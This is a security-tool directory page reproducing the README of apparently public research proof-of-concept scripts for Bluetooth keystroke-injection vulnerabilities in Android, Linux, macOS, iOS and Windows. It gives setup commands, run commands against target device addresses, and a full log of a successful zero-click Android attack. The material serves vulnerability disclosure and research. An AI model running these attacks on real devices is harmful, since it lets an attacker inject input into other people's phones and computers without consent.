Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/marcnewlin/hi_my_name_is_keyboard
Android SecurityBluetooth SecurityiOS SecurityExploitationWireless SecurityMobile SecurityHardware & IoT SecurityAdversarial Attack
GitHubmarcnewlin/hi_my_name_is_keyboard

hi_my_name_is_keyboard

Bluetooth keystroke injection exploit PoCs for CVE-2023-45866, CVE-2024-21306, and CVE-2024-0230 targeting Android, Linux, macOS, and iOS via emulated HID keyboards.

View Repository
731113252 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Hi, My Name is Keyboard

This repository contains proof-of-concept scripts for CVE-2023-45866, CVE-2024-21306, and CVE-2024-0230. Additional details can be found in the blog post.

Proof of ConceptDescription
Android Keystroke InjectionForce-pairs a virtual Bluetooth keyboard with a vulnerable Android device and injects 10 seconds of tab keypresses.
Linux Keystroke InjectionForce-pairs a virtual Bluetooth keyboard with a Linux host and injects 10 seconds of tab keypresses.
macOS Keystroke InjectionForce-pairs a virtual Bluetooth keyboard with a macOS host and injects keystrokes to open a web browser and perform a Google search.
iOS Keystroke InjectionForce-pairs a virtual Bluetooth keyboard with an iOS host and injects keystrokes to open a web browser and navigate to a URL.
Windows Keystroke InjectionForce-pairs a virtual Bluetooth keyboard with a Windows host and injects tab keypresses.
Magic Keyboard Link Key via Lightning PortReads the Bluetooth link key from the Lightning port on a Magic Keyboard.
Magic Keyboard Link Key via BluetoothReads the Bluetooth link key from the unauthenticated Bluetooth HID service on the Magic Keyboard.
Magic Keyboard Link Key via USB Port on the MacReads the Bluetooth link key for a target Magic Keyboard by spoofing the keyboard over USB to its paired Mac.

Dependencies

The scripts are known to work on an Ubuntu 22.04 host with a Broadcom-based Bluetooth adapter.

I primarily used this adapter: https://www.amazon.com/Kinivo-USB-Bluetooth-4-0-Compatible/dp/B007Q45EF4

Bus 001 Device 026: ID 0a5c:21e8 Broadcom Corp. BCM20702A0 Bluetooth 4.0

Starting from a clean install of Ubuntu 22.04, the dependencies can be installed with the following commands.

# update apt
sudo apt-get update
sudo apt-get -y upgrade

# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
                    git gcc python3-pip python3-setuptools \
                    python3-pydbus

# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install

# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/

Keystroke Injection

Android Keystroke Injection

Android devices are vulnerable prior to the 2023-12-05 security patch level.

When Bluetooth is enabled on an unpatched Android device, an attacker can pair an emulated Bluetooth keyboard and inject keystrokes, without user confirmation. This is a zero-click attack that works whenever Bluetooth is enabled.

Affected Versions

This vulnerability affects Android ~4.2.2 and later.

  • Android 4.2.2 - 10 will not be patched
  • Android 11 - 14 have patches available (2023-12-05 security patch level)
  • Pixel 6, 7 and 8 were patched
  • Pixel 5 and older remain vulnerable

Starting State

  • Bluetooth is enabled on the target Android device

Running the PoC

Run the PoC targeting Android device 5C:F3:70:AA:07:BD using interface hci1.

./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD

If successful, the PoC will inject a payload of tab keystrokes for 10 seconds.

Example Output

> ./keystroke-injection-android-linux.py -i hci1 -t 5C:F3:70:AA:07:BD
[2024-01-07 11:03:01.329]  executing 'sudo service bluetooth restart'
[2024-01-07 11:03:01.959]  configuring Bluetooth adapter
[2024-01-07 11:03:01.963]  calling RegisterProfile
[2024-01-07 11:03:01.966]  running dbus loop
[2024-01-07 11:03:02.096]  executing 'sudo hciconfig hci1 name Hi, My Name is Keyboard'
[2024-01-07 11:03:02.108]  executing 'hciconfig hci1 name'
[2024-01-07 11:03:02.128]  executing 'sudo hciconfig hci1 class 0x002540'
[2024-01-07 11:03:02.141]  executing 'hciconfig hci1 class'
[2024-01-07 11:03:02.144]  executing 'hcitool name 5C:F3:70:AA:07:BD'
[2024-01-07 11:03:02.877]  connecting to SDP
[2024-01-07 11:03:02.877]  connecting to 5C:F3:70:AA:07:BD on port 1
[2024-01-07 11:03:03.832]  SUCCESS! connected on port 1
[2024-01-07 11:03:03.832]  executing 'sudo btmgmt --index hci1 io-cap 1'
[2024-01-07 11:03:03.847]  executing 'sudo btmgmt --index hci1 ssp 1'
[2024-01-07 11:03:03.858]  connected to SDP (L2CAP 1) on target
[2024-01-07 11:03:03.865]  'NoInputNoOutput' pairing-agent is running
[2024-01-07 11:03:04.111]  connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:04.864]  ERROR connecting on port 19: [Errno 22] Invalid argument
[2024-01-07 11:03:04.864]  connecting to 5C:F3:70:AA:07:BD on port 17
[2024-01-07 11:03:04.932]  SUCCESS! connected on port 17
[2024-01-07 11:03:04.932]  connecting to HID Interrupt
[2024-01-07 11:03:04.932]  connecting to 5C:F3:70:AA:07:BD on port 19
[2024-01-07 11:03:05.008]  SUCCESS! connected on port 19
[2024-01-07 11:03:05.008]  connected to HID Interrupt (L2CAP 19) on target
[2024-01-07 11:03:05.008]  connected to HID Control (L2CAP 17) on target
[2024-01-07 11:03:05.009]  [RX-17] 9000
[2024-01-07 11:03:05.009]  [TX-17] 00
[2024-01-07 11:03:05.065]  [RX-19] a20101
[2024-01-07 11:03:05.259]  [TX-19] a101000000000000000000
[2024-01-07 11:03:05.259]  injecting Tab keypresses for 10 seconds
[2024-01-07 11:03:05.259]  [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.264]  [TX-19] a101000000000000000000
[2024-01-07 11:03:05.318]  [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.323]  [TX-19] a101000000000000000000
[2024-01-07 11:03:05.377]  [TX-19] a10100002b000000000000
[2024-01-07 11:03:05.382]  [TX-19] a101000000000000000000
[2024-01-07 11:03:05.436]  [TX-19] a10100002b000000000000
...
[2024-01-07 11:03:15.261]  [TX-19] a101000000000000000000
[2024-01-07 11:03:15.319]  payload has been transmitted; disconnecting Bluetooth HID client
[2024-01-07 11:03:15.321]  taking 'hci1' offline

Linux Keystroke Injection

Linux hosts running BlueZ 5 are vulnerable prior to patches rolling out in approximately December 2023. Specific version numbers depend on the Linux distribution.

When an unpatched Linux host is discoverable and connectable over Bluetooth, an attacker can pair an emulated Bluetooth keyboard and inject keystrokes, without user confirmation. This is a zero-click attack that works whenever the host is discoverable and connectable.

Affected Versions

This vulnerability is understood to affect unpatched Linux distributions using the default configuration of BlueZ 5.

Google states that ChromeOS was not affected by this vulnerability, and while ChromeOS was not tested as part of this research, their BlueZ configuration does appear to prevent the attack.

Affected distributions include Ubuntu, Debian, Gentoo, Arch, Fedora, Red Hat, Yocto, and Amazon Linux. Multiple releases may be affected, and Ubuntu, for instance, patched 16.04, 18.04, 20.04, 22.04, 23.04 and 23.10.

Starting State

  • The target Linux host is discoverable and connectable over Bluetooth.
  • Linux hosts are commonly discoverable and connectable when the Bluetooth settings panel is open.

Running the PoC

Run the PoC targeting Linux host 58:28:39:E6:AE:1C using interface hci1.

./keystroke-injection-android-linux.py -i hci1 -t 58:28:39:E6:AE:1C

If successful, the PoC will inject a payload of tab keystrokes for 10 seconds.

Example Output

Download Tool